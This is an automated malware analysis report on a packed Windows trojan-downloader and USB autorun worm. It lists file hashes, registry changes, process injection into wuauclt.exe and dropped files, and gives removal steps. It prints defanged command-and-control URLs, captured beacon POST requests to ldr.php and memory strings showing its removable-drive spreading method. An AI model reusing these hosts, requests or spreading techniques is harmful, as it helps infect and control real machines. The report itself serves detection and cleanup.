HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Kazy.299377 (B) (Emsisoft), Gen:Variant.Kazy.299377 (AdAware), Trojan-Downloader.Win32.Moure.FD, GenericAutorunWorm.YR (Lavasoft MAS)Behaviour: Trojan-Downloader, Trojan, Worm, WormAutorun
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: e825e09d39048006e06ff102411dcefa
SHA1: 0f76319f450b6aa85347104f26ff925d0d3f6589
SHA256: edd826f3852fbac15d0243f66749f23bbf6ca12271430332ec0a28194141faef
SSDeep: 3072:EtI09c0hZrMhSKVzP0zwj84kWmLa/J1/XzDqpOlKv3lJRScIfGUg9RHj/lfqmaT:EI09c ySK90zwjyZSJFjDqWq3lJnzX5i
Size: 232960 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: no data
Analyzed on: WindowsXPESX SP3 32-bit
Summary: Trojan-Downloader. Trojan program, which downloads files from the Internet without user's notice and executes them.
Dynamic Analysis
Payload
| Behaviour | Description |
|---|---|
| WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer. |
Process activity
The Trojan creates the following process(es):
%original file name%.exe:57416
%original file name%.exe:1332
The Trojan injects its code into the following process(es):
wuauclt.exe:57448
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process %original file name%.exe:57416 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_install_\msiexec.exe (82 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0B2.tmp (1281 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\0B2.tmp (0 bytes)
Registry activity
The process %original file name%.exe:57416 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 B4 52 1C 1C A6 7F 13 D4 83 A4 57 16 A2 9E 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software]
"ImageBase" = "80 93 C5 35 4A 35 35 35 49 35 35 35 36 36 35 35"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\_install_]
"msiexec.exe" = "msiexec"
[HKLM\SOFTWARE\Microsoft]
"0000000B" = "50 4B 03 04 00 EA 00 00 30 71 00 00 BC FC C2 2B"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The process %original file name%.exe:1332 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "57 4B FC 2B EF 26 25 0B 8E D1 53 35 5F BA A4 D8"
Dropped PE files
| MD5 | File path |
|---|---|
| 7ed265b1caa48a7eeb2246bb365778d8 | c:\Documents and Settings\All Users\Local Settings\Temp\cctrrfvwz.pif |
| 7ed265b1caa48a7eeb2246bb365778d8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\_install_\msiexec.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:57416
%original file name%.exe:1332 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\_install_\msiexec.exe (82 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0B2.tmp (1281 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: Hause
Product Name: Drenzag
Product Version: 5, 1, 8, 4
Legal Copyright: Copyright Radume(c) 2013
Legal Trademarks: Gioka(c)
Original Filename: Koda
Internal Name: Zdravka
File Version: 2, 1, 3, 2
File Description: Darko
Comments: Preshin
Language: English (United States)
Company Name: HauseProduct Name: DrenzagProduct Version: 5, 1, 8, 4Legal Copyright: Copyright Radume(c) 2013Legal Trademarks: Gioka(c)Original Filename: KodaInternal Name: ZdravkaFile Version: 2, 1, 3, 2File Description: DarkoComments: PreshinLanguage: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| UPX0 | 4096 | 1495040 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| UPX1 | 1499136 | 188416 | 188416 | 5.34055 | 31a279faf70559e66e2d1cff233a7c31 |
| .rsrc | 1687552 | 45056 | 43520 | 4.16141 | 250da1d858559ae8657f0ba7551e01ed |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://a.sobea.in/lptycgtycgkosxbosxbfjnrvjnrvaeib | 50.116.32.177 |
| hxxp://hzmksreiuojy.in/ldr.php | 195.22.26.254 |
| hxxp://hzmksreiuojy.ru/ldr.php | 195.22.26.252 |
| www.update.microsoft.com | 65.55.192.91 |
| hzmksreiuojy.biz | 69.195.129.70 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST /ldr.php HTTP/1.1
Host: hzmksreiuojy.ru
User-Agent: Mozilla/4.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
Connection: close
upqchSE8slDLE Bgn4KGIwiLrX8zUN68T3yqvhQu2TqetQn3qIy7Q6bpTfDUtYIftZ33Mx0PLwog9mY3qw==
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 16 Dec 2014 05:20:32 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8a6fcfa38b1f1fc92349b0a77bd76af7|"%local server IP%"|1418707232|1418707232|0|1|0
Set-Cookie: snkz="%local server IP%"
0..
POST /ldr.php HTTP/1.1
Host: hzmksreiuojy.in
User-Agent: Mozilla/4.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
Connection: close
upqchSE8slDLE Bgn4KGIwiLrX8zUN68T3yqvhQu2TqetQn3qIy7Q6bpTfDUtYIftZ33Mx0PLwog9mY3qw==
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 16 Dec 2014 05:20:32 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=6d2da922248a82e579d1e4af0c09337b|"%local server IP%"|1418707231|1418707231|0|1|0
Set-Cookie: snkz="%local server IP%"
0..
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
wuauclt.exe_57448:
.text
.text
`.data
`.data
.rsrc
.rsrc
@.reloc
@.reloc
wuauclt.pdb
wuauclt.pdb
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
_wcmdln
_wcmdln
_amsg_exit
_amsg_exit
msvcrt.dll
msvcrt.dll
ntdll.dll
ntdll.dll
ole32.dll
ole32.dll
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
RegCreateKeyExW
RegCreateKeyExW
ADVAPI32.dll
ADVAPI32.dll
USER32.dll
USER32.dll
OLEAUT32.dll
OLEAUT32.dll
SHLWAPI.dll
SHLWAPI.dll
zcÃ
zcÃ
version="6.0.0.0"
version="6.0.0.0"
name="Microsoft.Windows.windowsupdate.wuauclt"
name="Microsoft.Windows.windowsupdate.wuauclt"
true
true
name="Microsoft.Windows.Common-Controls"
name="Microsoft.Windows.Common-Controls"
publicKeyToken="6595b64144ccf1df"
publicKeyToken="6595b64144ccf1df"
wuaueng.dll
wuaueng.dll
Error: 0xx. wuauclt handler: failed to spawn COM server
Error: 0xx. wuauclt handler: failed to spawn COM server
Error: 0xx. wuauclt handler: failed to load wuaueng
Error: 0xx. wuauclt handler: failed to load wuaueng
/ReportNow
/ReportNow
/ShowWindowsUpdate
/ShowWindowsUpdate
/CloseWindowsUpdate
/CloseWindowsUpdate
wuauclt.exe failed to get proc address for UI export object with error %#lx
wuauclt.exe failed to get proc address for UI export object with error %#lx
Failed to load %s with error %X
Failed to load %s with error %X
wucltui.dll
wucltui.dll
wucltux.dll
wucltux.dll
call RunAUClientUI on wucltui.dll/wucltux.dll
call RunAUClientUI on wucltui.dll/wucltux.dll
Ntdll.dll
Ntdll.dll
WuSqm %ls session datapoint (id:%d) is incremented with dword %d.
WuSqm %ls session datapoint (id:%d) is incremented with dword %d.
wuauclt.exe is exiting with code 0xX
wuauclt.exe is exiting with code 0xX
wuauclt.exe launched with command line %s
wuauclt.exe launched with command line %s
kernel32.dll
kernel32.dll
WUWeb
WUWeb
Report
Report
7.6.7600.256
7.6.7600.256
Global\WindowsUpdateTracingMutex
Global\WindowsUpdateTracingMutex
WindowsUpdate.log
WindowsUpdate.log
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Trace
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Trace
Windows
Windows
shell32.dll
shell32.dll
%s: %s [
%s: %s [
%s: %s
%s: %s
%s\%s
%s\%s
= Module: %s
= Module: %s
= Module:
= Module:
= Process: %s
= Process: %s
= Process:
= Process:
=========== Logging initialized (build: %s, tz: %s) ===========
=========== Logging initialized (build: %s, tz: %s) ===========
wups2.dll
wups2.dll
wups.dll
wups.dll
Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Setup\ServiceStartup\
Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Setup\ServiceStartup\
%hs %ls page "%ls", hr=%X
%hs %ls page "%ls", hr=%X
Microsoft.WindowsUpdate
Microsoft.WindowsUpdate
wupdmgr.exe
wupdmgr.exe
Failed to cocreate IShellWindows, error = 0xlX
Failed to cocreate IShellWindows, error = 0xlX
Failed to obtain window doc for window %d, error = 0xlX
Failed to obtain window doc for window %d, error = 0xlX
Failed to obtain folder view for window %d, error = 0xlX
Failed to obtain folder view for window %d, error = 0xlX
Failed to obtain folder IPersist for window %d, error = 0xlX
Failed to obtain folder IPersist for window %d, error = 0xlX
Window %d is NOT a WU window
Window %d is NOT a WU window
Done enumerating windows
Done enumerating windows
Quit for window %d failed: 0xlX
Quit for window %d failed: 0xlX
Window %d is a WU window. Attempting to close
Window %d is a WU window. Attempting to close
Failed to obtain class ID for window %d, error = 0xlX
Failed to obtain class ID for window %d, error = 0xlX
Got NULL disp interface for window %d
Got NULL disp interface for window %d
Got %d instead of VT_DISPATCH for window %d
Got %d instead of VT_DISPATCH for window %d
Failed to obtain IWebBrowserApp for window %d, error = 0xlX
Failed to obtain IWebBrowserApp for window %d, error = 0xlX
Failed to enumerate window %d, error = 0xlX
Failed to enumerate window %d, error = 0xlX
Found %d explorer windows
Found %d explorer windows
Closing WU explorer windows
Closing WU explorer windows
Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\VolatileData
Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\VolatileData
WUAppNotificationWindows
WUAppNotificationWindows
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired\Mandatory
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired\Mandatory
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\PostRebootReporting
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\PostRebootReporting
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Services\Pending\
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Services\Pending\
%chdhd
%chdhd
hd-hd-hd%chd:hd:hd:hd
hd-hd-hd%chd:hd:hd:hd
Windows Update
Windows Update
7.6.7600.256 (winmain_wtr_wsus3sp2(oobla).120602-1459)
7.6.7600.256 (winmain_wtr_wsus3sp2(oobla).120602-1459)
wuauclt.exe
wuauclt.exe
Windows
Windows
Operating System
Operating System
wuauclt.exe_57448_rwx_000A0000_00009000:
.code
.code
.import
.import
NtDelayExecution
NtDelayExecution
ntdll.dll
ntdll.dll
GetWindowsDirectoryW
GetWindowsDirectoryW
kernel32.dll
kernel32.dll
software\microsoft\windows nt\currentversion\windows
software\microsoft\windows nt\currentversion\windows
software\microsoft\windows\currentversion\Policies\Explorer\Run
software\microsoft\windows\currentversion\Policies\Explorer\Run
ccX.dat
ccX.dat
hXXp://8.8.8.8/xxxxxxxxx.php
hXXp://8.8.8.8/xxxxxxxxx.php
hXXp://hzmksreiuojy.in/ldr.php
hXXp://hzmksreiuojy.in/ldr.php
hXXp://hzmksreiuojy.ru/ldr.php
hXXp://hzmksreiuojy.ru/ldr.php
hXXp://hzmksreiuojy.com/ldr.php
hXXp://hzmksreiuojy.com/ldr.php
hXXp://hzmksreiuojy.biz/ldr.php
hXXp://hzmksreiuojy.biz/ldr.php
hXXp://hzmksreiuojy.nl/ldr.php
hXXp://hzmksreiuojy.nl/ldr.php
POST /%s HTTP/1.1
POST /%s HTTP/1.1
Host: %s
Host: %s
User-Agent: Mozilla/4.0
User-Agent: Mozilla/4.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Content-Length: %d
Content-Length: %d
GET /%s HTTP/1.0
GET /%s HTTP/1.0
VVV.update.microsoft.com
VVV.update.microsoft.com
GetProcessHeap
GetProcessHeap
ws2_32.dll
ws2_32.dll
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyExA
RegSetKeySecurity
RegSetKeySecurity
advapi32.dll
advapi32.dll
user32.dll
user32.dll
dnsapi.dll
dnsapi.dll
KERNEL32.DLL
KERNEL32.DLL
\system32\wuauclt.exe
\system32\wuauclt.exe
\syswow64\svchost.exe
\syswow64\svchost.exe
4%userprofile%
4%userprofile%
%s\cc%s.%s
%s\cc%s.%s
)X
)X
x.exe
x.exe
wuauclt.exe_57448_rwx_003B0000_00005000:
software\microsoft\windows nt\currentversion\windows
software\microsoft\windows nt\currentversion\windows
software\microsoft\windows\currentversion\Policies\Explorer\Run
software\microsoft\windows\currentversion\Policies\Explorer\Run
ccX.dat
ccX.dat
hXXp://8.8.8.8/xxxxxxxxx.php
hXXp://8.8.8.8/xxxxxxxxx.php
hXXp://hzmksreiuojy.in/ldr.php
hXXp://hzmksreiuojy.in/ldr.php
hXXp://hzmksreiuojy.ru/ldr.php
hXXp://hzmksreiuojy.ru/ldr.php
hXXp://hzmksreiuojy.com/ldr.php
hXXp://hzmksreiuojy.com/ldr.php
hXXp://hzmksreiuojy.biz/ldr.php
hXXp://hzmksreiuojy.biz/ldr.php
hXXp://hzmksreiuojy.nl/ldr.php
hXXp://hzmksreiuojy.nl/ldr.php
POST /%s HTTP/1.1
POST /%s HTTP/1.1
Host: %s
Host: %s
User-Agent: Mozilla/4.0
User-Agent: Mozilla/4.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Content-Length: %d
Content-Length: %d
GET /%s HTTP/1.0
GET /%s HTTP/1.0
VVV.update.microsoft.com
VVV.update.microsoft.com
NtDelayExecution
NtDelayExecution
ntdll.dll
ntdll.dll
GetProcessHeap
GetProcessHeap
kernel32.dll
kernel32.dll
ws2_32.dll
ws2_32.dll
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyExA
RegSetKeySecurity
RegSetKeySecurity
advapi32.dll
advapi32.dll
user32.dll
user32.dll
dnsapi.dll
dnsapi.dll
4%userprofile%
4%userprofile%
%s\cc%s.%s
%s\cc%s.%s
)X
)X
x.exe
x.exe
wuauclt.exe_57448_rwx_00400000_0000E000:
.text
.text
`.data
`.data
.rsrc
.rsrc
@.reloc
@.reloc
wuauclt.pdb
wuauclt.pdb
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
_wcmdln
_wcmdln
_amsg_exit
_amsg_exit
msvcrt.dll
msvcrt.dll
ntdll.dll
ntdll.dll
ole32.dll
ole32.dll
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
RegCreateKeyExW
RegCreateKeyExW
ADVAPI32.dll
ADVAPI32.dll
USER32.dll
USER32.dll
OLEAUT32.dll
OLEAUT32.dll
SHLWAPI.dll
SHLWAPI.dll
zcÃ
zcÃ
version="6.0.0.0"
version="6.0.0.0"
name="Microsoft.Windows.windowsupdate.wuauclt"
name="Microsoft.Windows.windowsupdate.wuauclt"
true
true
name="Microsoft.Windows.Common-Controls"
name="Microsoft.Windows.Common-Controls"
publicKeyToken="6595b64144ccf1df"
publicKeyToken="6595b64144ccf1df"
wuaueng.dll
wuaueng.dll
Error: 0xx. wuauclt handler: failed to spawn COM server
Error: 0xx. wuauclt handler: failed to spawn COM server
Error: 0xx. wuauclt handler: failed to load wuaueng
Error: 0xx. wuauclt handler: failed to load wuaueng
/ReportNow
/ReportNow
/ShowWindowsUpdate
/ShowWindowsUpdate
/CloseWindowsUpdate
/CloseWindowsUpdate
wuauclt.exe failed to get proc address for UI export object with error %#lx
wuauclt.exe failed to get proc address for UI export object with error %#lx
Failed to load %s with error %X
Failed to load %s with error %X
wucltui.dll
wucltui.dll
wucltux.dll
wucltux.dll
call RunAUClientUI on wucltui.dll/wucltux.dll
call RunAUClientUI on wucltui.dll/wucltux.dll
Ntdll.dll
Ntdll.dll
WuSqm %ls session datapoint (id:%d) is incremented with dword %d.
WuSqm %ls session datapoint (id:%d) is incremented with dword %d.
wuauclt.exe is exiting with code 0xX
wuauclt.exe is exiting with code 0xX
wuauclt.exe launched with command line %s
wuauclt.exe launched with command line %s
kernel32.dll
kernel32.dll
WUWeb
WUWeb
Report
Report
7.6.7600.256
7.6.7600.256
Global\WindowsUpdateTracingMutex
Global\WindowsUpdateTracingMutex
WindowsUpdate.log
WindowsUpdate.log
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Trace
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Trace
Windows
Windows
shell32.dll
shell32.dll
%s: %s [
%s: %s [
%s: %s
%s: %s
%s\%s
%s\%s
= Module: %s
= Module: %s
= Module:
= Module:
= Process: %s
= Process: %s
= Process:
= Process:
=========== Logging initialized (build: %s, tz: %s) ===========
=========== Logging initialized (build: %s, tz: %s) ===========
wups2.dll
wups2.dll
wups.dll
wups.dll
Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Setup\ServiceStartup\
Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Setup\ServiceStartup\
%hs %ls page "%ls", hr=%X
%hs %ls page "%ls", hr=%X
Microsoft.WindowsUpdate
Microsoft.WindowsUpdate
wupdmgr.exe
wupdmgr.exe
Failed to cocreate IShellWindows, error = 0xlX
Failed to cocreate IShellWindows, error = 0xlX
Failed to obtain window doc for window %d, error = 0xlX
Failed to obtain window doc for window %d, error = 0xlX
Failed to obtain folder view for window %d, error = 0xlX
Failed to obtain folder view for window %d, error = 0xlX
Failed to obtain folder IPersist for window %d, error = 0xlX
Failed to obtain folder IPersist for window %d, error = 0xlX
Window %d is NOT a WU window
Window %d is NOT a WU window
Done enumerating windows
Done enumerating windows
Quit for window %d failed: 0xlX
Quit for window %d failed: 0xlX
Window %d is a WU window. Attempting to close
Window %d is a WU window. Attempting to close
Failed to obtain class ID for window %d, error = 0xlX
Failed to obtain class ID for window %d, error = 0xlX
Got NULL disp interface for window %d
Got NULL disp interface for window %d
Got %d instead of VT_DISPATCH for window %d
Got %d instead of VT_DISPATCH for window %d
Failed to obtain IWebBrowserApp for window %d, error = 0xlX
Failed to obtain IWebBrowserApp for window %d, error = 0xlX
Failed to enumerate window %d, error = 0xlX
Failed to enumerate window %d, error = 0xlX
Found %d explorer windows
Found %d explorer windows
Closing WU explorer windows
Closing WU explorer windows
Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\VolatileData
Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\VolatileData
WUAppNotificationWindows
WUAppNotificationWindows
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired\Mandatory
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired\Mandatory
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\PostRebootReporting
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\PostRebootReporting
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Services\Pending\
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Services\Pending\
%chdhd
%chdhd
hd-hd-hd%chd:hd:hd:hd
hd-hd-hd%chd:hd:hd:hd
Windows Update
Windows Update
7.6.7600.256 (winmain_wtr_wsus3sp2(oobla).120602-1459)
7.6.7600.256 (winmain_wtr_wsus3sp2(oobla).120602-1459)
wuauclt.exe
wuauclt.exe
Windows
Windows
Operating System
Operating System
wuauclt.exe_57448_rwx_00900000_00013000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
GetProcessWindowStation
GetProcessWindowStation
T:\ldr\CUSTOM\local\Worm65.DLL.PnP\Release\Worm65.DLL.pdb
T:\ldr\CUSTOM\local\Worm65.DLL.PnP\Release\Worm65.DLL.pdb
URLDownloadToFileW
URLDownloadToFileW
urlmon.dll
urlmon.dll
KERNEL32.dll
KERNEL32.dll
keybd_event
keybd_event
USER32.dll
USER32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
GetCPInfo
GetCPInfo
Worm65.DLL.dll
Worm65.DLL.dll
[.ShellClassInfo]
[.ShellClassInfo]
IconResource=%systemroot%\system32\SHELL32.dll,7
IconResource=%systemroot%\system32\SHELL32.dll,7
IconFile=%SystemRoot%\system32\SHELL32.dll
IconFile=%SystemRoot%\system32\SHELL32.dll
%System%\wuauclt.exe
%System%\wuauclt.exe
nKERNEL32.DLL
nKERNEL32.DLL
mscoree.dll
mscoree.dll
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
WUSER32.DLL
WUSER32.DLL
hXXp://a.sobea.in/
hXXp://a.sobea.in/
hXXp://b.sobea.in/
hXXp://b.sobea.in/
hXXp://c.sobea.in/
hXXp://c.sobea.in/
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
%s\%s
%s\%s
%s.exe
%s.exe
Thumbs.db
Thumbs.db
desktop.ini
desktop.ini
autorun.inf
autorun.inf
Wkernel32.dll
Wkernel32.dll
%s\desktop.ini
%s\desktop.ini
%s\_W%s.init
%s\_W%s.init
%s\Thumbs.db
%s\Thumbs.db
_W%s.init,krnl %s %s
_W%s.init,krnl %s %s
%s\Removable Disk (%dGB).lnk
%s\Removable Disk (%dGB).lnk
shell32.dll
shell32.dll
%s\%s (%dGB).lnk
%s\%s (%dGB).lnk
%sautorun.inf
%sautorun.inf